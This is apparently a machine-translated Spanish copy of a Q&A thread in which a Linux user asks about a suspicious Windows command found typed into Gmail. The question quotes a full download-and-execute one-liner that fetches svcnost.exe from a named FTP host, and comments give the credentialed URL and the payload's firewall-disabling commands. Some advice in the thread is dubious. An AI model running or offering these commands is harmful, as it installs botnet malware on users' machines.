¿Cómo identificar si mi computadora con Linux fue pirateada?

128

La PC de mi casa generalmente está encendida, pero el monitor está apagado. Esta tarde llegué a casa del trabajo y encontré lo que parece un intento de pirateo: en mi navegador, mi Gmail estaba abierto (ese era yo), pero estaba en modo de composición con lo siguiente en el TOcampo:

md / c echo open cCTeamFtp.yi.org 21 >> usuario de ik & echo ccteam10 765824 >> ik & echo binary >> ik & echo get svcnost.exe >> ik & echo bye >> ik & ftp -n -v -s: ik & del ik & svcnost.exe & exit echo Tienes propiedad

Esto me parece un código de línea de comando de Windows, y el mdinicio del código combinado con el hecho de que Gmail estaba en modo de composición, hace evidente que alguien intentó ejecutar un cmdcomando. Creo que tuve la suerte de no ejecutar Windows en esta PC, pero tengo otros que sí. Esta es la primera vez que algo así me ha sucedido. No soy un gurú de Linux, y no estaba ejecutando ningún otro programa aparte de Firefox en ese momento.

Estoy absolutamente seguro de que no escribí esto, y nadie más estaba físicamente en mi computadora. Además, recientemente cambié mi contraseña de Google (y todas mis otras contraseñas) a algo así, vMA8ogd7bvasí que no creo que alguien haya pirateado mi cuenta de Google.

¿Lo que acaba de suceder? ¿Cómo alguien presiona las teclas en mi computadora cuando no es la vieja máquina Windows de Granny la que ha estado ejecutando malware durante años, sino una nueva instalación reciente de Ubuntu?

Actualización:
Permítanme abordar algunos de los puntos y preguntas:

  • Estoy en Austria, en el campo. Mi enrutador WLAN ejecuta WPA2 / PSK y una contraseña medianamente segura que no está en el diccionario; tendría que ser fuerza bruta y menos de 50 metros de aquí; No es probable que haya sido pirateado.
  • Estoy usando un teclado con cable USB, por lo que nuevamente es muy poco probable que alguien pueda estar dentro del alcance para hackearlo.
  • No estaba usando mi computadora en ese momento; simplemente estaba inactivo en casa mientras yo estaba en el trabajo. Es una PC nettop montada en un monitor, por lo que rara vez la apago.
  • La máquina tiene solo dos meses, solo ejecuta Ubuntu y no estoy usando software extraño o visitando sitios extraños. Es principalmente Stack Exchange, Gmail y periódicos. No juegos. Ubuntu está configurado para mantenerse actualizado.
  • No conozco ningún servicio VNC en ejecución; Ciertamente no he instalado ni habilitado uno. Tampoco he iniciado ningún otro servidor. ¿No estoy seguro si alguno se está ejecutando en Ubuntu por defecto?
  • Conozco todas las direcciones IP en la actividad de la cuenta de Gmail. Estoy bastante seguro de que Google no era una entrada.
  • Encontré un Visor de archivos de registro , pero no sé qué buscar. ¿Ayuda?

Lo que realmente quiero saber es, y lo que realmente me hace sentir inseguro, es: ¿cómo puede alguien de Internet generar pulsaciones de teclas en mi máquina? ¿Cómo puedo evitar eso sin ser tan tonto? No soy un geek de Linux, soy un padre que ha estado jugando con Windows por más de 20 años y estoy cansado de eso. Y en los más de 18 años de estar en línea, nunca he visto personalmente ningún intento de pirateo, por lo que esto es nuevo para mí.

Torben Gundtofte-Bruun
fuente
44
¿Alguien más tuvo acceso a su computadora o tiene un teclado inalámbrico muy antiguo? Además, Ubuntu tiene un servidor VNC incorporado. Si está activo, un script aleatorio en algún lugar podría haberse conectado y asumir que era una computadora con Windows, enviando las teclas WIN + R, cmd ......
TuxRug
29
@torbengb: Tu publicación realmente me asusta ...
Mehrdad
99
¿Hay otras computadoras en su red inalámbrica? Si el intruso rompió su seguridad, le daría una "entrada" a su red local, lo que podría conducir a descifrar la caja de Ubuntu de varias maneras.
CarlF
44
@muntoo ... y estoy seguro de que no has escrito eso en ningún lado y tampoco utilizas ninguna aplicación para administrarlos, ¿verdad? No comencemos a usar contraseñas; al menos mi contraseña no es password:-)
Torben Gundtofte-Bruun
66
¿Tienes un gato?
Zaki

Respuestas:

66

Dudo que tengas algo de qué preocuparte. Era más que probable un ataque de JavaScript que intentara hacer una unidad por descarga . Si le preocupa que esto suceda, comience a usar NoScript y AdBlock Plus Firefox Add-Ons.

Incluso al visitar sitios confiables no está seguro porque ejecutan código JavaScript de anunciantes externos que pueden ser maliciosos.

Lo agarré y lo ejecuté en una máquina virtual. Instaló mirc y este es el registro de estado ... http://pastebin.com/Mn85akMk

Es un ataque automatizado que intenta hacer que descargue mIRC y se una a una botnet que lo convertirá en un robot de spam ... Tenía mi VM unida y conectó a varias direcciones remotas diferentes, una de las cuales es autoemail-119.west320.com.

Ejecutándolo en Windows 7 tuve que aceptar el aviso de UAC y permitirle el acceso a través del firewall.

Parece que hay muchos informes de este comando exacto en otros foros, y alguien incluso dice que un archivo torrent intentó ejecutarlo cuando terminó la descarga ... Sin embargo, no estoy seguro de cómo sería posible.

No lo he usado yo mismo, pero debería poder mostrarle las conexiones de red actuales para que pueda ver si está conectado a algo fuera de lo normal: http://netactview.sourceforge.net/download.html

Riguez
fuente
10
Er, ¿por qué se eliminaron todos los comentarios (incluso los altamente relevantes que descubrieron que el script intentó abrir una cmdventana) ?
BlueRaja - Danny Pflughoeft
¿Estaría a salvo de este tipo de ataque si recién comenzara a usar uBlock Origin?
RobotUnderscore
42

Estoy de acuerdo con @ jb48394 en que probablemente sea un exploit de JavaScript, como todo lo demás en estos días.

El hecho de que trató de abrir una cmdventana (ver el comentario de @ torbengb ) y ejecutar un comando malicioso, en lugar de simplemente descargar el troyano discretamente en segundo plano, sugiere que explota cierta vulnerabilidad en Firefox que le permite ingresar pulsaciones de teclas, pero No ejecutar código.

Esto también explica por qué este exploit, que se escribió claramente exclusivamente para Windows, también funcionaría en Linux: Firefox ejecuta JavaScript de la misma manera en todos los sistemas operativos (al menos, intenta :)) . Si fuera causado por un desbordamiento del búfer o una vulnerabilidad similar para Windows, simplemente habría bloqueado el programa.

En cuanto a de dónde vino el código JavaScript, probablemente un anuncio malicioso de Google (los anuncios circulan en Gmail durante todo el día) . Que no iba a ser la primera vez .

BlueRaja - Danny Pflughoeft
fuente
44
Buenas referencias.
kizzx2
99
Para su información para los skimmers, ese último "enlace" es en realidad cinco enlaces separados.
Pops
Sería bastante impactante si realmente es un exploit de Javascript ya que mi Firefox normalmente permanece abierto durante días. Sin embargo, debe llamar a una API especial para enviar claves a otro sistema en Windows y probablemente a una llamada diferente al sistema (si existe) en Linux. Dado que el envío de teclas no es una operación normal de Javascript, dudo que Firefox implemente una llamada multiplataforma para eso.
billc.cn
1
@ billc.cn: creo que escribir en el búfer de teclado PS / 2 funciona igual independientemente del sistema operativo .
BlueRaja - Danny Pflughoeft
12

Encontré un ataque similar en otra máquina Linux. Parece que es algún tipo de comando FTP para Windows.

Shekhar
fuente
8
Más precisamente, descarga y ejecuta el archivo ftp://ccteam10:[email protected]/svcnost.exeusando la ftpherramienta de línea de comandos de Windows .
Grawity
lo encontré en pastebin también pastebin.com/FXwRpKH4
Shekhar
aquí hay información sobre el sitio whois.domaintools.com/216.210.179.67
Shekhar
99
Es un paquete WinRAR SFX que contiene una instalación portátil mIRC y un archivo llamado "DriverUpdate.exe". DriverUpdate.exe ejecuta (al menos) dos comandos shell: netsh firewall set desactivar OPMODE y taskkill / F / IM Vcspawn.exe / T También intentos (creo) para añadir die-freesms-seite.com a la zona de confianza de Internet Explorer y bypass proxy.
Andrew Lambert el
5

Esto no responde a toda su pregunta, pero en el archivo de registro busque intentos fallidos de inicio de sesión.

Si hay más de cinco intentos fallidos en su registro, alguien intentó descifrarlo root. Si hay un intento exitoso de iniciar sesión rootmientras estaba lejos de su computadora, ¡CAMBIE SU CONTRASEÑA INMEDIATAMENTE! ¡Quiero decir AHORA MISMO! Preferiblemente a algo alfanumérico, y aproximadamente 10 caracteres de largo.

Con los mensajes que recibiste (los echocomandos) esto realmente suena como un script para niños inmaduros . Si se tratara de un verdadero hacker que sabe lo que está haciendo, probablemente aún no lo sabría.

Nate Koppenhaver
fuente
2
Estoy de acuerdo en que esto fue evidentemente muy aficionado. Al menos no deberían haber hecho eco de lo que has tenido al final. ¿Me hace preguntarme si algún "verdadero hacker" alguna vez lo logró? O de hecho debería preguntar, ¿cuántos?
Torben Gundtofte-Bruun
1
@torgengb: si el comando se ejecutara en un símbolo del sistema de Windows, no vería el eco (debido a &exit)
BlueRaja - Danny Pflughoeft
-1

whois informa que west320.com es propiedad de Microsoft.

¿UPnP y Vino (Sistema -> Preferencias -> Escritorio remoto) combinados con una contraseña de Ubuntu débil?

¿Utilizaste repositorios no estándar?

DEF CON tiene una competencia de Wi-Fi cada año en cuanto a qué tan lejos se puede llegar a un punto de acceso a Wi-Fi, la última vez que escuché que era 250 millas.

Si realmente quieres asustarte, mira las capturas de pantalla de un centro de comando y control de una botnet Zeus . Ninguna máquina es segura, pero Firefox en Linux es más seguro que el resto. Aún mejor, si ejecuta SELinux .

rjt
fuente
1
El autor de este exploit claramente no tenía intención de ejecutar esto en Linux, por lo que dudo que tenga algo que ver con una utilidad de gnomo vulnerable o una contraseña débil (también, OP ya mencionó que tiene una contraseña segura)
BlueRaja - Danny Pflughoeft
En realidad, no menciona tener una contraseña de Ubuntu, solo un gmail y una frase de contraseña inalámbrica. Un niño que ejecuta metasploit puede que ni siquiera sepa sobre Linux, solo ve VNC. Es muy probable que sea un ataque de JavaScript.
rjt